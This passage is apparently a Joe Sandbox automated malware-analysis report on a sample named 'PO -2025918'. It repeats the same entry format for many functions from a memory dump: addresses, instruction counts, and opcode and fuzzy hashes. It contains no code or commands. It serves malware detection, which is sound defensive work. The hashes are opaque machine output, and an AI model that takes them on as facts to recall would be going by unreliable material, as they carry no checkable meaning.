                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6fc312186bc3fd01d3823b4d12dc7f4c1235d99c2dbae1d97ca55ccfdbe51c37
                                                                                                                            • Instruction ID: 2657cb3857f19ef06304a1eb8da803fb62e0528465142dcafc4379c7a43f3380
                                                                                                                            • Opcode Fuzzy Hash: 6fc312186bc3fd01d3823b4d12dc7f4c1235d99c2dbae1d97ca55ccfdbe51c37
                                                                                                                            • Instruction Fuzzy Hash: B4210AB1E40249EBCB14DFAAD880AAEFBF9FF98A10F10016FE405A7254D7709941CB60
                                                                                                                            Function 01C280A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                            • Instruction ID: 3a7884c964ad71fa9fa3a08c78751d093a84172ff709acdac1feb4b0d1eb1067
                                                                                                                            • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                            • Instruction Fuzzy Hash: 1A216A72A00219EFDF129F98CC40BAEBBFAEF98310F204459F901A7291D774DA509B50
                                                                                                                            Function 01BC0124 Relevance: .1, Instructions: 68COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                            • Instruction ID: 2e957bfe0f3ce56eeec87bb6dc2fa3b31fa025f201cec6027c2494e9ebd76f32
                                                                                                                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                            • Instruction Fuzzy Hash: 1811E276600605EFDB2AAB4ADC41F9ABBBCEB80B54F1040ADF6008B180D771EE44CB60
                                                                                                                            Function 01B98770 Relevance: .1, Instructions: 68COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7d4e1f0330ed2e1e72db24ff9f10be7b507f48b69fd24f6202f03b5fc12fe107
                                                                                                                            • Instruction ID: badaf768dbabbaec5d9e0377ef5c9e770681e32f0ab1b0a16ad6d0dfaa957584
                                                                                                                            • Opcode Fuzzy Hash: 7d4e1f0330ed2e1e72db24ff9f10be7b507f48b69fd24f6202f03b5fc12fe107
                                                                                                                            • Instruction Fuzzy Hash: 10119D717006199B9F19CF5DC5C0A6ABBE9EF4B710B1980B9EE089F205D7B2D902C790
                                                                                                                            Function 01BCAAEE Relevance: .1, Instructions: 68COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                            • Instruction ID: 9d0c0c06497777a7ef9eab929914b0a6c8f6f875d5037583bf6bd3a26e177fa0
                                                                                                                            • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                            • Instruction Fuzzy Hash: 7E218E71600649DFDB3A9F59C540A66FBE6EB94F10F1489BDE649C7A10E730ED01CB50
                                                                                                                            Function 01B980E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f10c19b5ccc3ad93e654afa4681820f8c834f69ffd937b9118664dc444d5fa7c
                                                                                                                            • Instruction ID: a0129b6fc8309c9d703471b35119316c61c9db06f07e4f7a98ffcf0ad3369142
                                                                                                                            • Opcode Fuzzy Hash: f10c19b5ccc3ad93e654afa4681820f8c834f69ffd937b9118664dc444d5fa7c
                                                                                                                            • Instruction Fuzzy Hash: 91216F75A00219DFCB18CF59C581B6EBBB5FB89318F2441ADD105A7311C771AD06CBD0
                                                                                                                            Function 01BC674D Relevance: .1, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a4f8c09b305926bb5b9acc67063a3ad09997eac47ad59285eae3ef80c4aa6ec0
                                                                                                                            • Instruction ID: a864e470650c293586859f544df66abe9433b85469c40189e69dc0b0fd314925
                                                                                                                            • Opcode Fuzzy Hash: a4f8c09b305926bb5b9acc67063a3ad09997eac47ad59285eae3ef80c4aa6ec0
                                                                                                                            • Instruction Fuzzy Hash: 72218C71600A01EFD7298F68C880F66B7E8FF44B50F40886EE69AC7751EB30A940CB60
                                                                                                                            Function 01BBE8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 072d9c30785aeaadcd89f1eadc06df005838a49c3f61c8dc1e22b57458a06f0c
                                                                                                                            • Instruction ID: 5f68e7dd6b98d6bc12e925884c01894fdd0fbc8eb0913e928b5c24082b7133a3
                                                                                                                            • Opcode Fuzzy Hash: 072d9c30785aeaadcd89f1eadc06df005838a49c3f61c8dc1e22b57458a06f0c
                                                                                                                            • Instruction Fuzzy Hash: 4111E5733041249FCF1DEA29CCD1ABB7697EBD5274B2545ADDA228B691EA30D806C290
                                                                                                                            Function 01C26870 Relevance: .1, Instructions: 63COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 582eba21ad6cf6bc152a8a6889aecd1c00ccca340dfb16ae6f9ebfa274403498
                                                                                                                            • Instruction ID: f60962ec49376de8c7fdf46ff42121058198abdd98fea744468ab2aea12341ba
                                                                                                                            • Opcode Fuzzy Hash: 582eba21ad6cf6bc152a8a6889aecd1c00ccca340dfb16ae6f9ebfa274403498
                                                                                                                            • Instruction Fuzzy Hash: C211C132340674EFC722DB6AC980F9AB7A8EB55760F014065FA41DB260DEB1E901C7A0
                                                                                                                            Function 01BC66B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 929fe6d2edb7f26689a8d2693be75b24c8482db07e3d8a7507ad3955c48bc523
                                                                                                                            • Instruction ID: 24fff528057fb0bc4f0bfd0fbccde3a9cbf35d6056018dc9c90c62b32c8145bf
                                                                                                                            • Opcode Fuzzy Hash: 929fe6d2edb7f26689a8d2693be75b24c8482db07e3d8a7507ad3955c48bc523
                                                                                                                            • Instruction Fuzzy Hash: 28116D76A01215DBCB29DF99C580E5ABBE5EF94B50B4544BEDD059B311E730DD00CB90
                                                                                                                            Function 01C5A8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                            • Instruction ID: 11ae77f804e8cffb9e73f30312b8918cca1ec1a90e630634c9f2667d7c90df4c
                                                                                                                            • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                            • Instruction Fuzzy Hash: 4811EF36A00919EFDB19CB59C805A9EFBB5EF84210F058269EC56A7390E631EE41CB84
                                                                                                                            Function 01B90AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                            • Instruction ID: a62ecc38a8f4872c66972583aa6b14a858697d9150b6950ee534b3888310b0d4
                                                                                                                            • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                            • Instruction Fuzzy Hash: F42106B5A00B059FD7A0CF29D440B52BBF4FB48B20F10892EE98AC7B40E371E814CB90
                                                                                                                            Function 01C1E7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                            • Instruction ID: c46a5f6a7c1a0d5ae6035a853edbef1aa8756a706f13b29b23b6d726fd651967
                                                                                                                            • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                            • Instruction Fuzzy Hash: 10119131640601EFFB369F4DC840B5A7BA5EF46758F058428EE09DB154DB31DE41EB90
                                                                                                                            Function 01BB27ED Relevance: .1, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c916c94fb3beeb896a4119bc705ffd19fa352bdee0a0aca46169c909161b9c20
                                                                                                                            • Instruction ID: ae840617a7f7b0946824d36344d50dc4f023642a28aa172efbb14280a71142ab
                                                                                                                            • Opcode Fuzzy Hash: c916c94fb3beeb896a4119bc705ffd19fa352bdee0a0aca46169c909161b9c20
                                                                                                                            • Instruction Fuzzy Hash: E401D631605645ABE71EA26DDCC4F777B9CEF41794F0500F9FA058B691DB64EC01C2A1
                                                                                                                            Function 01B94690 Relevance: .1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: edf289aa3784091b61b0a209c22495fdf63919d998c0df403e1f936d5f4c67cc
                                                                                                                            • Instruction ID: eb96ed754261bb744d24d490205e1cb2a3bb85c8bede70b3d59956baa1831088
                                                                                                                            • Opcode Fuzzy Hash: edf289aa3784091b61b0a209c22495fdf63919d998c0df403e1f936d5f4c67cc
                                                                                                                            • Instruction Fuzzy Hash: 1611E9352106499FDF2DCF5DDA40F5A7BA8EB9A764F0041A9F90487250C378E803CF60
                                                                                                                            Function 01C64B00 Relevance: .1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6a9fe271791e2b88e2f6a6dc67c8d9166604aba5b6a19135d7087e2937803abf
                                                                                                                            • Instruction ID: 5cf4334dd1b544a0cdd6d838afd25464a1e283afc13533cdcef695fcbfd3e321
                                                                                                                            • Opcode Fuzzy Hash: 6a9fe271791e2b88e2f6a6dc67c8d9166604aba5b6a19135d7087e2937803abf
                                                                                                                            • Instruction Fuzzy Hash: 4611C636204A11DFD7299A69D8C0F6BB7A9FFC4710F154429E64287A54DB30E902C790
                                                                                                                            Function 01BC6620 Relevance: .1, Instructions: 56COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9b2d18380529e5d17d74a3938efde66ffa7eaf347d46559d723e205d59461dba
                                                                                                                            • Instruction ID: e49b5ad2d7e0abfdd7aecf1e16484017f64c9067caa10d8d0d90649e75433ecd
                                                                                                                            • Opcode Fuzzy Hash: 9b2d18380529e5d17d74a3938efde66ffa7eaf347d46559d723e205d59461dba
                                                                                                                            • Instruction Fuzzy Hash: AA118672A00715ABDB25DF59C9C0F9EFBB9EF44B50F5504A9EA05A7301D770AD018B50
                                                                                                                            Function 01BBEA2E Relevance: .1, Instructions: 56COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 37d4e163d58d83b8dd599b61442d9cf5e2960fe920be2198b0e5e2008cac2183
                                                                                                                            • Instruction ID: 5a348a69525a1bc38d9e9dd75c5092d37ea096e78a8e05155e7246a269e0f06d
                                                                                                                            • Opcode Fuzzy Hash: 37d4e163d58d83b8dd599b61442d9cf5e2960fe920be2198b0e5e2008cac2183
                                                                                                                            • Instruction Fuzzy Hash: 620192B5500105DFCB29DF19D584FA6BBF9EB95358F2081BAE1058B661D7F0DC42CB90
                                                                                                                            Function 01BBE53E Relevance: .1, Instructions: 55COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                            • Instruction ID: f01cc9c6d55138d6c4d39ddf8263d32e5f8a4622077be75f47a1822d69af7d34
                                                                                                                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                            • Instruction Fuzzy Hash: DA11E5722056C2DBEB2B976CC984BB57BE4EB00744F1900E8DF4197AA2F768C846C250
                                                                                                                            Function 01C1E75D Relevance: .1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                            • Instruction ID: a85a4ad078f500985ac47ab8cd29177d28ba6e10b64f5564949775c5994350b2
                                                                                                                            • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                            • Instruction Fuzzy Hash: 0F01C032640106EFFB26AF59C800B5A7BA9EB42750F068064EE05DB264E775DE40EBD0
                                                                                                                            Function 01B8A250 Relevance: .1, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                            • Instruction ID: 1be2b775807d0b8c011d76eaafece7413c4f831ff58e88e2ac80a11efc94cf6f
                                                                                                                            • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                            • Instruction Fuzzy Hash: F10149314047219BCB399F29D840A327BF4FF55F6070086AEFD958B281D331D400CB60
                                                                                                                            Function 01C64940 Relevance: .1, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 674b4c942d49ceb4017949631e6684c315a0a4593192c4e340b92249834e2d9a
                                                                                                                            • Instruction ID: 64f53fc46aa887e956ec280ae8a158c49bf3e600f3a080f2dc83f1de372e4adf
                                                                                                                            • Opcode Fuzzy Hash: 674b4c942d49ceb4017949631e6684c315a0a4593192c4e340b92249834e2d9a
                                                                                                                            • Instruction Fuzzy Hash: 77014532481241DFC73ADF1CDC80E12BBACEB91374B2542A5E9A89B1A2E730DD01CBC0
                                                                                                                            Function 01C0E1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a5a0215454c07fe778e6523df10f830fc0fb29ec1a60f7f54e3607a6b32fbd6f
                                                                                                                            • Instruction ID: 9b8a62c68938ef35af3b16958c0c28d58c004c3f9352c438d437ba39cb34e07f
                                                                                                                            • Opcode Fuzzy Hash: a5a0215454c07fe778e6523df10f830fc0fb29ec1a60f7f54e3607a6b32fbd6f
                                                                                                                            • Instruction Fuzzy Hash: 3C118B32241641EFDB1AEF19CD80F56BBB8FF58B94F2004B5E9059B6A1C335ED01CA90
                                                                                                                            Function 01B96259 Relevance: .1, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7b54593444747f76228b171fc42a2852169b74cda52398d88e6acb742561b4c4
                                                                                                                            • Instruction ID: 0741adfdeb6b02a3e98b1db42404ce811856ab7c8ee62665532e436d653d6850
                                                                                                                            • Opcode Fuzzy Hash: 7b54593444747f76228b171fc42a2852169b74cda52398d88e6acb742561b4c4
                                                                                                                            • Instruction Fuzzy Hash: FB114C70541229ABDF2DAB64CD41FE9B3B4AB14714F5041D4A318E60E0E7709A86CF84
                                                                                                                            Function 01B9208A Relevance: .0, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                            • Instruction ID: 5606a460e21719e43ad05b43d4ef92f07944245b08a6b5651a45ddbbd6c2bb30
                                                                                                                            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                            • Instruction Fuzzy Hash: F301F9326001009BEF199A5DD884A627766FFC8600F5541F9DD41CF246DB71C842C390
                                                                                                                            Function 01C16050 Relevance: .0, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fa9537c0bae1e70ce44c3f646bbe26847c31a0bb9995c99526a65a7d69992764
                                                                                                                            • Instruction ID: 06b7860e550d199dc53fb63f1948dc6cc8dfc7d59ad806de5385a434001e7b73
                                                                                                                            • Opcode Fuzzy Hash: fa9537c0bae1e70ce44c3f646bbe26847c31a0bb9995c99526a65a7d69992764
                                                                                                                            • Instruction Fuzzy Hash: E2111772900019EBCF25DB94CC80EEFBB7CEF58258F044166E906A7211EA34EA55CBA0
                                                                                                                            Function 01C26500 Relevance: .0, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 41f20da4201e33ac8a6d41cdcadf9263603c19654e1f9c0dbc6af9c7220ca5e7
                                                                                                                            • Instruction ID: f18a8efe9820c99827fe9b86d4268389a8450d9452b4b0a9b3cd8dca7147fa7c
                                                                                                                            • Opcode Fuzzy Hash: 41f20da4201e33ac8a6d41cdcadf9263603c19654e1f9c0dbc6af9c7220ca5e7
                                                                                                                            • Instruction Fuzzy Hash: 2B11CE32604166DFC711CF19C800BA6BBB9BB5A304F088169E8488B315D732E980CBA0
                                                                                                                            Function 01C1C810 Relevance: .0, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dc92c52121e79b8cee4276155b5be4b88b1d72ca58ef4ae1af6b1c30ebe03551
                                                                                                                            • Instruction ID: 8b1ac8ad2a12a78aeae9f72b1ebe696825fbf8f103d4bd575c313c63c6d9371e
                                                                                                                            • Opcode Fuzzy Hash: dc92c52121e79b8cee4276155b5be4b88b1d72ca58ef4ae1af6b1c30ebe03551
                                                                                                                            • Instruction Fuzzy Hash: E9111CB1A00209DBCB04DF99D581A9EB7F4FF58250F10406AB905E7351E674EE018BA4
                                                                                                                            Function 01C3EA60 Relevance: .0, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8ed48de5a2b4527483db857776383b95af36f4fe357d3b6ac6c81592e893f229
